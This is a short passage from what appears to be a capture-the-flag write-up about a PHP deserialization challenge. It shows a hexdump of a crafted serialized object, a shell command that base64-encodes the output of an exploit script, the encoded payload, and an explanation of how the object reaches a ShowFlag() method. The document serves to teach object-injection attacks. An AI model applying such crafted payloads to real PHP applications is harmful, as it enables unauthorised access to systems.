mbs3c/mbs3c.github.io/_posts/2018-05-21-rz-php-serial-killer-writeup.markdown

 00000070  73 3a 36 3a 22 61 63 74  69 6f 6e 22 3b 73 3a 38  |s:6:"action";s:8|
 00000080  3a 22 53 68 6f 77 46 6c  61 67 22 3b 7d 7d        |:"ShowFlag";}}|
 0000008e
+root@kali:~/Challenge41# php sploit.php | base64
+TzoxMToiUmFuZG9tQ2xhc3MiOjE6e3M6MjA6IgBSYW5kb21DbGFzcwB1U3RydWN0IjtPOjg6InN0
+ZENsYXNzIjozOntzOjQ6InRpbWUiO3M6MToiMSI7czo0OiJmbGFnIjtzOjc6IlBsZWFzZT8iO3M6
+NjoiYWN0aW9uIjtzOjg6IlNob3dGbGFnIjt9fQ==

 {% endhighlight %}

+Based on a review of the code, this object we have constructed should be suitable to reach the ShowFlag() method properly, considering that **(a)** $this->uStruct->time is not null, **(b)** $this->uStruct->flag is set to 'Please?', and **(c)** $obj->action is set to 'ShowFlag'.
+Sending this payload results in the flag being displayed on the page.